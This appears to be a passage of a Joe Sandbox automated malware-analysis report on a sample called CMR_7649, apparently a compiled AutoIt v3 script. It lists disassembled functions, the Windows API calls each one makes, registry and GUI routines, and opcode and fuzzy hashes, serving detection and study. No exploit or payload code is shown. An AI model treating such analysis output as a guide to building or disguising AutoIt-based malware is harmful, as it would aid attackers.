                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                • DeleteObject.GDI32(?), ref: 00459551
                                                • DestroyWindow.USER32(?), ref: 00459563
                                                • GetDesktopWindow.USER32 ref: 00459581
                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                • _wcslen.LIBCMT ref: 00459916
                                                • _wcscpy.LIBCMT ref: 0045993A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                • GetDC.USER32(00000000), ref: 004599FC
                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 4040870279-2373415609
                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                • String ID:
                                                • API String ID: 69173610-0
                                                • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-3360698832
                                                • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                • SetCursor.USER32(00000000), ref: 00430773
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                • SetCursor.USER32(00000000), ref: 00430803
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                • SetCursor.USER32(00000000), ref: 00430833
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                • SetCursor.USER32(00000000), ref: 00430863
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                • SetCursor.USER32(00000000), ref: 00430887
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Cursor$Load
                                                • String ID:
                                                • API String ID: 1675784387-0
                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1582027408-0
                                                • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 3217815495-966354055
                                                • Opcode ID: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
